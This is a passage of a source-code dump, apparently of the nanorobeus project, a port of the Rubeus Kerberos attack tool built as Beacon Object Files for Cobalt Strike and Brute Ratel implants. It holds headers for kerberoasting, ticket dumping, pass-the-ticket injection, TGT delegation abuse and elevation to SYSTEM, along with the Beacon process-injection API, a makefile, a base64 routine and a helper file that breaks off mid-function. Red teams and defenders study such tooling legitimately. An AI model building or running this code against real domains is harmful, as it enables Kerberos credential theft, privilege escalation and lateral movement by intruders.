LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 79 | * 80 | */ 81 | 82 | #pragma once 83 | 84 | int Base64encode_len(int len); 85 | int Base64encode(char* coded_dst, const char* plain_src, int len_plain_src); 86 | 87 | int Base64decode_len(const char* coded_src); 88 | int Base64decode(char* plain_dst, const char* coded_src); 89 | -------------------------------------------------------------------------------- /nanorobeus/include/beacon.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | /* data API */ 3 | #include 4 | #ifdef BOF 5 | typedef struct { 6 | char *original; /* the original buffer [so we can free it] */ 7 | char *buffer; /* current pointer into our buffer */ 8 | int length; /* remaining length of data */ 9 | int size; /* total size of this buffer */ 10 | } datap; 11 | 12 | DECLSPEC_IMPORT void BeaconDataParse(datap *parser, char *buffer, int size); 13 | DECLSPEC_IMPORT int BeaconDataInt(datap *parser); 14 | DECLSPEC_IMPORT short BeaconDataShort(datap *parser); 15 | DECLSPEC_IMPORT int BeaconDataLength(datap *parser); 16 | DECLSPEC_IMPORT char *BeaconDataExtract(datap *parser, int *size); 17 | 18 | /* format API */ 19 | typedef struct { 20 | char *original; /* the original buffer [so we can free it] */ 21 | char *buffer; /* current pointer into our buffer */ 22 | int length; /* remaining length of data */ 23 | int size; /* total size of this buffer */ 24 | } formatp; 25 | 26 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp *format, int maxsz); 27 | DECLSPEC_IMPORT void BeaconFormatReset(formatp *format); 28 | DECLSPEC_IMPORT void BeaconFormatFree(formatp *format); 29 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp *format, char *text, int len); 30 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp *format, char *fmt, ...); 31 | DECLSPEC_IMPORT char *BeaconFormatToString(formatp *format, int *size); 32 | DECLSPEC_IMPORT void BeaconFormatInt(formatp *format, int value); 33 | 34 | /* Output Functions */ 35 | #define CALLBACK_OUTPUT 0x0 36 | #define CALLBACK_OUTPUT_OEM 0x1e 37 | #define CALLBACK_ERROR 0x0d 38 | #define CALLBACK_OUTPUT_UTF8 0x20 39 | 40 | DECLSPEC_IMPORT void BeaconPrintf(int type, char *fmt, ...); 41 | DECLSPEC_IMPORT void BeaconOutput(int type, char *data, int len); 42 | 43 | /* Token Functions */ 44 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 45 | DECLSPEC_IMPORT void BeaconRevertToken(); 46 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 47 | 48 | /* Spawn+Inject Functions */ 49 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char *buffer, int length); 50 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char *payload, int p_len, int p_offset, char *arg, 51 | int a_len); 52 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION *pInfo, char *payload, int p_len, int p_offset, 53 | char *arg, int a_len); 54 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION *pInfo); 55 | 56 | /* Utility Functions */ 57 | DECLSPEC_IMPORT BOOL toWideChar(char *src, wchar_t *dst, int max); 58 | 59 | #define PRINT(dispatch, ...) \ 60 | { BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); } 61 | #elif BRC4 62 | DECLSPEC_IMPORT int BadgerDispatch(WCHAR **dispatch, const char *__format, ...); 63 | DECLSPEC_IMPORT int BadgerDispatchW(WCHAR **dispatch, const WCHAR *__format, ...); 64 | DECLSPEC_IMPORT size_t BadgerStrlen(CHAR *buf); 65 | DECLSPEC_IMPORT size_t BadgerWcslen(WCHAR *buf); 66 | 67 | DECLSPEC_IMPORT void *BadgerMemcpy(void *dest, const void *src, size_t len); 68 | DECLSPEC_IMPORT void *BadgerMemset(void *dest, int val, size_t len); 69 | 70 | DECLSPEC_IMPORT int BadgerStrcmp(const char *p1, const char *p2); 71 | DECLSPEC_IMPORT int BadgerWcscmp(const wchar_t *s1, const wchar_t *s2); 72 | DECLSPEC_IMPORT int BadgerAtoi(char *string); 73 | 74 | #define PRINT(dispatch, ...) \ 75 | { BadgerDispatch(dispatch, __VA_ARGS__); } 76 | #else 77 | 78 | #define PRINT(dispatch, ...) \ 79 | { fprintf(stdout, __VA_ARGS__); } 80 | 81 | #endif 82 | -------------------------------------------------------------------------------- /nanorobeus/include/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "beacon.h" 8 | #include "bofdefs.h" 9 | 10 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 11 | #define STATUS_MEMORY_NOT_ALLOCATED ((NTSTATUS)0xC00000A0L) 12 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) == 0) 13 | 14 | typedef struct _LOGON_SESSION_DATA { 15 | PSECURITY_LOGON_SESSION_DATA* sessionData; 16 | ULONG sessionCount; 17 | } LOGON_SESSION_DATA, PLOGON_SESSION_DATA; 18 | 19 | enum KERB_ETYPE { 20 | DES_CBC_CRC = 1, 21 | DES_CBC_MD4 = 2, 22 | DES_CBC_MD5 = 3, 23 | DES3_CBC_MD5 = 5, 24 | DES3_CBC_SHA1 = 7, 25 | DSAWITHSHA1_CMSOID = 9, 26 | MD5WITHRSAENCRYPTION_CMSOID = 10, 27 | SHA1WITHRSAENCRYPTION_CMSOID = 11, 28 | RC2CBC_ENVOID = 12, 29 | RSAENCRYPTION_ENVOID = 13, 30 | RSAES_OAEP_ENV_OID = 14, 31 | DES3_CBC_SHA1_KD = 16, 32 | AES128_CTS_HMAC_SHA1 = 17, 33 | AES256_CTS_HMAC_SHA1 = 18, 34 | RC4_HMAC = 23, 35 | RC4_HMAC_EXP = 24, 36 | SUBKEY_KEYMATERIAL = 65, 37 | OLD_EXP = -135 38 | }; 39 | 40 | HANDLE GetCurrentToken(DWORD DesiredAccess); 41 | char* GetEncryptionTypeString(LONG encType); 42 | SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li); 43 | BOOL IsHighIntegrity(HANDLE TokenHandle); 44 | BOOL IsSystem(HANDLE TokenHandle); 45 | NTSTATUS GetLsaHandle(HANDLE hProcessToken, BOOL highIntegrity, HANDLE* hLsa); 46 | int GetProcessIdByName(WCHAR* processName); 47 | BOOL ElevateToSystem(); 48 | char* GetNarrowString(WCHAR* src); 49 | char* GetNarrowStringFromUnicode(UNICODE_STRING src); 50 | WCHAR* GetWideString(char* src); -------------------------------------------------------------------------------- /nanorobeus/include/kerberoast.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | void execute_kerberoast(WCHAR** dispatch, char* spn); -------------------------------------------------------------------------------- /nanorobeus/include/klist.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "base64.h" 6 | #include "common.h" 7 | #include "sessions.h" 8 | 9 | void execute_klist(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid, BOOL dump); 10 | void EnumerateTickets(LUID*, BOOL, HANDLE); 11 | NTSTATUS ExtractTicket(HANDLE hLsa, ULONG authPackage, LUID luid, UNICODE_STRING targetName, PUCHAR* ticket, 12 | PULONG ticketSize); 13 | void PrintTicketInfo(WCHAR** dispatch, KERB_TICKET_CACHE_INFO_EX cacheInfo); 14 | void PrintTicketFlags(WCHAR** dispatch, ULONG ticketFlags); 15 | -------------------------------------------------------------------------------- /nanorobeus/include/krb5.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "msasn1.h" 4 | 5 | // Copyright (c) Microsoft Corporation 6 | 7 | #define KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR 11 8 | #define KRB_KEY_USAGE_KRB_CRED_ENCRYPTED_PART 14 9 | 10 | #define version_present 0x80 11 | #define ticket_extensions_present 0x80 12 | #define checksum_present 0x80 13 | #define KERB_AUTHENTICATOR_subkey_present 0x40 14 | #define KERB_AUTHENTICATOR_sequence_number_present 0x20 15 | #define KERB_AUTHENTICATOR_authorization_data_present 0x10 16 | #define subject_public_key_present 0x80 17 | 18 | #define KERB_ENCRYPTED_DATA_PDU 6 19 | #define KERB_ENCRYPTION_KEY_PDU 7 20 | #define KERB_CHECKSUM_PDU 8 21 | #define KERB_REPLY_KEY_PACKAGE2_PDU 15 22 | #define KERB_TICKET_PDU 28 23 | #define KERB_AUTHENTICATOR_PDU 30 24 | #define KERB_AP_REQUEST_PDU 31 25 | #define KERB_CRED_PDU 36 26 | 27 | #define SIZE_KRB5_Module_PDU_6 sizeof(KERB_ENCRYPTED_DATA) 28 | #define SIZE_KRB5_Module_PDU_7 sizeof(KERB_ENCRYPTION_KEY) 29 | #define SIZE_KRB5_Module_PDU_8 sizeof(KERB_CHECKSUM) 30 | #define SIZE_KRB5_Module_PDU_15 sizeof(KERB_REPLY_KEY_PACKAGE2) 31 | #define SIZE_KRB5_Module_PDU_28 sizeof(KERB_TICKET) 32 | #define SIZE_KRB5_Module_PDU_30 sizeof(KERB_AUTHENTICATOR) 33 | #define SIZE_KRB5_Module_PDU_31 sizeof(KERB_AP_REQUEST) 34 | #define SIZE_KRB5_Module_PDU_36 sizeof(KERB_CRED) 35 | 36 | typedef LONG KERBERR, *PKERBERR; 37 | #define KDC_ERR_NONE ((KERBERR)0x0) 38 | #define KRB_ERR_GENERIC ((KERBERR)0x3C) 39 | #define KDC_ERR_MORE_DATA ((KERBERR)0x80000001) 40 | #define KERB_SUCCESS(_kerberr_) ((KERBERR)(_kerberr_) == KDC_ERR_NONE) 41 | 42 | typedef struct _KERB_GSS_CHECKSUM { 43 | ULONG BindLength; 44 | ULONG BindHash[4]; 45 | ULONG GssFlags; 46 | USHORT Delegation; 47 | USHORT DelegationLength; 48 | UCHAR DelegationInfo[ANYSIZE_ARRAY]; 49 | } KERB_GSS_CHECKSUM, *PKERB_GSS_CHECKSUM; 50 | 51 | typedef ASN1ztcharstring_t KERB_PRINCIPAL_NAME_name_string_Seq; 52 | typedef struct KERB_PRINCIPAL_NAME_name_string_s* PKERB_PRINCIPAL_NAME_name_string; 53 | typedef struct KERB_PRINCIPAL_NAME_name_string_s { 54 | PKERB_PRINCIPAL_NAME_name_string next; 55 | KERB_PRINCIPAL_NAME_name_string_Seq value; 56 | } KERB_PRINCIPAL_NAME_name_string_Element, *KERB_PRINCIPAL_NAME_name_string; 57 | 58 | typedef struct PKERB_TICKET_EXTENSIONS_s* PPKERB_TICKET_EXTENSIONS; 59 | typedef struct PKERB_TICKET_EXTENSIONS_Seq { 60 | ASN1int32_t te_type; 61 | ASN1octetstring_t te_data; 62 | } PKERB_TICKET_EXTENSIONS_Seq; 63 | typedef struct PKERB_TICKET_EXTENSIONS_s { 64 | PPKERB_TICKET_EXTENSIONS next; 65 | PKERB_TICKET_EXTENSIONS_Seq value; 66 | } PKERB_TICKET_EXTENSIONS_Element, *PKERB_TICKET_EXTENSIONS; 67 | 68 | typedef ASN1bitstring_t KERB_AP_OPTIONS; 69 | typedef ASN1ztcharstring_t KERB_REALM; 70 | typedef ASN1generalizedtime_t KERB_TIME; 71 | typedef ASN1intx_t KERB_SEQUENCE_NUMBER_LARGE; 72 | 73 | typedef struct PKERB_AUTHORIZATION_DATA_Seq { 74 | ASN1int32_t auth_data_type; 75 | ASN1octetstring_t auth_data; 76 | } PKERB_AUTHORIZATION_DATA_Seq; 77 | 78 | typedef struct PKERB_AUTHORIZATION_DATA_s* PPKERB_AUTHORIZATION_DATA; 79 | typedef struct PKERB_AUTHORIZATION_DATA_s { 80 | PPKERB_AUTHORIZATION_DATA next; 81 | PKERB_AUTHORIZATION_DATA_Seq value; 82 | } PKERB_AUTHORIZATION_DATA_Element, *PKERB_AUTHORIZATION_DATA; 83 | 84 | typedef struct KERB_PRINCIPAL_NAME { 85 | ASN1int32_t name_type; 86 | PKERB_PRINCIPAL_NAME_name_string name_string; 87 | } KERB_PRINCIPAL_NAME; 88 | 89 | typedef struct KERB_ENCRYPTED_DATA { 90 | union { 91 | ASN1uint16_t bit_mask; 92 | ASN1octet_t o[1]; 93 | }; 94 | ASN1int32_t encryption_type; 95 | ASN1int32_t version; 96 | ASN1octetstring_t cipher_text; 97 | } KERB_ENCRYPTED_DATA; 98 | 99 | typedef struct KERB_ENCRYPTION_KEY { 100 | ASN1int32_t keytype; 101 | ASN1octetstring_t keyvalue; 102 | } KERB_ENCRYPTION_KEY; 103 | 104 | typedef struct KERB_CHECKSUM { 105 | ASN1int32_t checksum_type; 106 | ASN1octetstring_t checksum; 107 | } KERB_CHECKSUM; 108 | 109 | typedef struct KERB_REPLY_KEY_PACKAGE2 { 110 | union { 111 | ASN1uint16_t bit_mask; 112 | ASN1octet_t o[1]; 113 | }; 114 | KERB_ENCRYPTION_KEY reply_key; 115 | ASN1int32_t nonce; 116 | ASN1bitstring_t subject_public_key; 117 | } KERB_REPLY_KEY_PACKAGE2; 118 | 119 | typedef struct KERB_TICKET { 120 | union { 121 | ASN1uint16_t bit_mask; 122 | ASN1octet_t o[1]; 123 | }; 124 | ASN1int32_t ticket_version; 125 | KERB_REALM realm; 126 | KERB_PRINCIPAL_NAME server_name; 127 | KERB_ENCRYPTED_DATA encrypted_part; 128 | PPKERB_TICKET_EXTENSIONS ticket_extensions; 129 | } KERB_TICKET; 130 | 131 | typedef struct KERB_AUTHENTICATOR { 132 | union { 133 | ASN1uint16_t bit_mask; 134 | ASN1octet_t o[1]; 135 | }; 136 | ASN1int32_t authenticator_version; 137 | KERB_REALM client_realm; 138 | KERB_PRINCIPAL_NAME client_name; 139 | KERB_CHECKSUM checksum; 140 | ASN1int32_t client_usec; 141 | KERB_TIME client_time; 142 | KERB_ENCRYPTION_KEY subkey; 143 | KERB_SEQUENCE_NUMBER_LARGE sequence_number; 144 | PPKERB_AUTHORIZATION_DATA authorization_data; 145 | } KERB_AUTHENTICATOR; 146 | 147 | typedef struct KERB_AP_REQUEST { 148 | ASN1int32_t version; 149 | ASN1int32_t message_type; 150 | KERB_AP_OPTIONS ap_options; 151 | KERB_TICKET ticket; 152 | KERB_ENCRYPTED_DATA authenticator; 153 | } KERB_AP_REQUEST, *PKERB_AP_REQUEST; 154 | 155 | typedef struct KERB_CRED_tickets_s* PKERB_CRED_tickets; 156 | typedef struct KERB_CRED_tickets_s { 157 | PKERB_CRED_tickets next; 158 | KERB_TICKET value; 159 | } KERB_CRED_tickets_Element, *KERB_CRED_tickets; 160 | typedef struct KERB_CRED { 161 | ASN1int32_t version; 162 | ASN1int32_t message_type; 163 | PKERB_CRED_tickets tickets; 164 | KERB_ENCRYPTED_DATA encrypted_part; 165 | } KERB_CRED; 166 | 167 | ASN1module_t ASN1CALL KRB5_Module_Startup(void); 168 | void ASN1CALL KRB5_Module_Cleanup(ASN1module_t module); 169 | KERBERR KerbInitAsn(ASN1module_t module, ASN1encoding_t* pEnc, ASN1decoding_t* pDec); 170 | void KerbTermAsn(ASN1encoding_t pEnc, ASN1decoding_t pDec); 171 | KERBERR NTAPI KerbUnpackData(ASN1module_t module, PUCHAR Data, ULONG DataSize, ULONG PduValue, PVOID* DecodedData); 172 | KERBERR NTAPI KerbPackData(ASN1module_t module, PVOID Data, ULONG PduValue, PULONG DataSize, PUCHAR* EncodedData); 173 | void KerbFreeData(ASN1module_t module, ULONG PduValue, PVOID Data); -------------------------------------------------------------------------------- /nanorobeus/include/luid.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "common.h" 5 | 6 | void execute_luid(WCHAR** dispatch, HANDLE hToken); 7 | LUID* GetCurrentLUID(HANDLE TokenHandle); 8 | -------------------------------------------------------------------------------- /nanorobeus/include/ptt.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "common.h" 5 | #include "base64.h" 6 | 7 | #define _KerbSubmitTicketMessage 21 8 | 9 | typedef struct _KERB_CRYPTO_KEY32 10 | { 11 | int KeyType; 12 | int Length; 13 | int Offset; 14 | } KERB_CRYPTO_KEY32, *PKERB_CRYPTO_KEY32; 15 | 16 | typedef struct _KERB_SUBMIT_TKT_REQUEST 17 | { 18 | KERB_PROTOCOL_MESSAGE_TYPE MessageType; 19 | LUID LogonId; 20 | int Flags; 21 | KERB_CRYPTO_KEY32 Key; // key to decrypt KERB_CRED 22 | int KerbCredSize; 23 | int KerbCredOffset; 24 | } KERB_SUBMIT_TKT_REQUEST, *PKERB_SUBMIT_TKT_REQUEST; 25 | 26 | void execute_ptt(WCHAR** dispatch, HANDLE hToken, char* ticket, LUID luid, BOOL currentLuid); -------------------------------------------------------------------------------- /nanorobeus/include/purge.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "common.h" 6 | 7 | void execute_purge(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid); 8 | -------------------------------------------------------------------------------- /nanorobeus/include/sessions.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "bofdefs.h" 5 | #include "common.h" 6 | #include "luid.h" 7 | 8 | void execute_sessions(WCHAR** dispatch, HANDLE hToken, LUID luid, BOOL currentLuid); 9 | NTSTATUS GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data); 10 | char* GetLogonTypeString(ULONG uLogonType); 11 | void PrintLogonSessionData(WCHAR** dispatch, SECURITY_LOGON_SESSION_DATA data); -------------------------------------------------------------------------------- /nanorobeus/include/tgtdeleg.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include "bofdefs.h" 6 | #include "common.h" 7 | #include "base64.h" 8 | #include "msasn1.h" 9 | #include "krb5.h" 10 | 11 | void execute_tgtdeleg(WCHAR** dispatch, HANDLE hToken, char* spn); 12 | PBYTE SearchOID(LPCVOID data, SIZE_T size); 13 | PVOID MemorySearch(LPCVOID pattern, SIZE_T pSize, LPCVOID buf, SIZE_T bSize); 14 | NTSTATUS KerberosDecrypt(DWORD keyUsage, KERB_ENCRYPTION_KEY* key, ASN1octetstring_t* in, ASN1octetstring_t* out); 15 | NTSTATUS GetKeyFromCache(HANDLE hToken, char* target, LONG encType, PUCHAR* key, PULONG keySize); 16 | LONG RequestApReq(char *spn, PUCHAR* apreq, PULONG apreqSize, BOOL checkDelegate); -------------------------------------------------------------------------------- /nanorobeus/makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := nanorobeus 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | CC_x86 := i686-w64-mingw32-gcc 4 | STRIP := strip 5 | OPTIONS := -O3 -masm=intel -Wall -Wextra -g -I include -fno-reorder-functions 6 | 7 | .PHONY: all 8 | 9 | all: bof_64 bof_86 10 | 11 | bof_64: 12 | $(CC_x64) -c src/entry.c -o bin/$(BOFNAME).x64.o -DBOF $(OPTIONS) 13 | $(STRIP) --strip-unneeded bin/$(BOFNAME).x64.o 14 | 15 | bof_86: 16 | $(CC_x86) -c src/entry.c -o bin/$(BOFNAME).x86.o -DBOF $(OPTIONS) 17 | $(STRIP) --strip-unneeded bin/$(BOFNAME).x86.o 18 | -------------------------------------------------------------------------------- /nanorobeus/src/base64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2003 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * Copyright (c) 1999-2003 Apple Computer, Inc. All Rights Reserved. 7 | * 8 | * This file contains Original Code and/or Modifications of Original Code 9 | * as defined in and that are subject to the Apple Public Source License 10 | * Version 2.0 (the 'License'). You may not use this file except in 11 | * compliance with the License. Please obtain a copy of the License at 12 | * http://www.opensource.apple.com/apsl/ and read it before using this 13 | * file. 14 | * 15 | * The Original Code and all software distributed under the License are 16 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 17 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 18 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 19 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 20 | * Please see the License for the specific language governing rights and 21 | * limitations under the License. 22 | * 23 | * @APPLE_LICENSE_HEADER_END@ 24 | */ 25 | /* ==================================================================== 26 | * Copyright (c) 1995-1999 The Apache Group. All rights reserved. 27 | * 28 | * Redistribution and use in source and binary forms, with or without 29 | * modification, are permitted provided that the following conditions 30 | * are met: 31 | * 32 | * 1. Redistributions of source code must retain the above copyright 33 | * notice, this list of conditions and the following disclaimer. 34 | * 35 | * 2. Redistributions in binary form must reproduce the above copyright 36 | * notice, this list of conditions and the following disclaimer in 37 | * the documentation and/or other materials provided with the 38 | * distribution. 39 | * 40 | * 3. All advertising materials mentioning features or use of this 41 | * software must display the following acknowledgment: 42 | * "This product includes software developed by the Apache Group 43 | * for use in the Apache HTTP server project (http://www.apache.org/)." 44 | * 45 | * 4. The names "Apache Server" and "Apache Group" must not be used to 46 | * endorse or promote products derived from this software without 47 | * prior written permission. For written permission, please contact 48 | * apache@apache.org. 49 | * 50 | * 5. Products derived from this software may not be called "Apache" 51 | * nor may "Apache" appear in their names without prior written 52 | * permission of the Apache Group. 53 | * 54 | * 6. Redistributions of any form whatsoever must retain the following 55 | * acknowledgment: 56 | * "This product includes software developed by the Apache Group 57 | * for use in the Apache HTTP server project (http://www.apache.org/)." 58 | * 59 | * THIS SOFTWARE IS PROVIDED BY THE APACHE GROUP ``AS IS'' AND ANY 60 | * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 61 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 62 | * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE APACHE GROUP OR 63 | * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 64 | * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 65 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 66 | * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 67 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 68 | * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 69 | * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED 70 | * OF THE POSSIBILITY OF SUCH DAMAGE. 71 | * ==================================================================== 72 | * 73 | * This software consists of voluntary contributions made by many 74 | * individuals on behalf of the Apache Group and was originally based 75 | * on public domain software written at the National Center for 76 | * Supercomputing Applications, University of Illinois, Urbana-Champaign. 77 | * For more information on the Apache Group and the Apache HTTP server 78 | * project, please see . 79 | * 80 | */ 81 | 82 | /* Base64 encoder/decoder. Originally Apache file ap_base64.c 83 | */ 84 | 85 | #include 86 | 87 | #include "base64.h" 88 | 89 | /* aaaack but it's fast and const should make it shared text page. */ 90 | static const unsigned char pr2six[256] = { 91 | /* ASCII table */ 92 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 93 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 94 | 64, 64, 64, 64, 64, 64, 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 95 | 22, 23, 24, 25, 64, 64, 64, 64, 64, 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 96 | 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 97 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 98 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 99 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 100 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64}; 101 | 102 | int Base64decode_len(const char* bufcoded) { 103 | int nbytesdecoded; 104 | const unsigned char* bufin; 105 | int nprbytes; 106 | 107 | bufin = (const unsigned char*)bufcoded; 108 | while (pr2six[*(bufin++)] <= 63) 109 | ; 110 | 111 | nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 112 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 113 | 114 | return nbytesdecoded + 1; 115 | } 116 | 117 | int Base64decode(char* bufplain, const char* bufcoded) { 118 | int nbytesdecoded; 119 | const unsigned char* bufin; 120 | unsigned char* bufout; 121 | int nprbytes; 122 | 123 | bufin = (const unsigned char*)bufcoded; 124 | while (pr2six[*(bufin++)] <= 63) 125 | ; 126 | nprbytes = (bufin - (const unsigned char*)bufcoded) - 1; 127 | nbytesdecoded = ((nprbytes + 3) / 4) * 3; 128 | 129 | bufout = (unsigned char*)bufplain; 130 | bufin = (const unsigned char*)bufcoded; 131 | 132 | while (nprbytes > 4) { 133 | *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 134 | *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 135 | *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 136 | bufin += 4; 137 | nprbytes -= 4; 138 | } 139 | 140 | /* Note: (nprbytes == 1) would be an error, so just ingore that case */ 141 | if (nprbytes > 1) { 142 | *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4); 143 | } 144 | if (nprbytes > 2) { 145 | *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2); 146 | } 147 | if (nprbytes > 3) { 148 | *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]); 149 | } 150 | 151 | *(bufout++) = '\0'; 152 | nbytesdecoded -= (4 - nprbytes) & 3; 153 | return nbytesdecoded; 154 | } 155 | 156 | static const char basis_64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 157 | 158 | int Base64encode_len(int len) { return ((len + 2) / 3 * 4) + 1; } 159 | 160 | int Base64encode(char* encoded, const char* string, int len) { 161 | int i; 162 | char* p; 163 | 164 | p = encoded; 165 | for (i = 0; i < len - 2; i += 3) { 166 | *p++ = basis_64[(string[i] >> 2) & 0x3F]; 167 | *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 168 | *p++ = basis_64[((string[i + 1] & 0xF) << 2) | ((int)(string[i + 2] & 0xC0) >> 6)]; 169 | *p++ = basis_64[string[i + 2] & 0x3F]; 170 | } 171 | if (i < len) { 172 | *p++ = basis_64[(string[i] >> 2) & 0x3F]; 173 | if (i == (len - 1)) { 174 | *p++ = basis_64[((string[i] & 0x3) << 4)]; 175 | *p++ = '='; 176 | } else { 177 | *p++ = basis_64[((string[i] & 0x3) << 4) | ((int)(string[i + 1] & 0xF0) >> 4)]; 178 | *p++ = basis_64[((string[i + 1] & 0xF) << 2)]; 179 | } 180 | *p++ = '='; 181 | } 182 | 183 | *p++ = '\0'; 184 | return p - encoded; 185 | } 186 | -------------------------------------------------------------------------------- /nanorobeus/src/common.c: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | HANDLE GetCurrentToken(DWORD DesiredAccess) { 4 | HANDLE hCurrentToken = NULL; 5 | if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken)) { 6 | if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN) { 7 | if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken)) { 8 | return NULL; 9 | } 10 | } 11 | } 12 | return hCurrentToken; 13 | } 14 | 15 | char* GetEncryptionTypeString(LONG encType) { 16 | char* encTypeStr = NULL; 17 | switch (encType) { 18 | case DES_CBC_CRC: 19 | encTypeStr = "DES_CBC_CRC"; 20 | break; 21 | case DES_CBC_MD4: 22 | encTypeStr = "DES_CBC_MD4"; 23 | break; 24 | case DES_CBC_MD5: 25 | encTypeStr = "DES_CBC_MD5"; 26 | break; 27 | case DES3_CBC_MD5: 28 | encTypeStr = 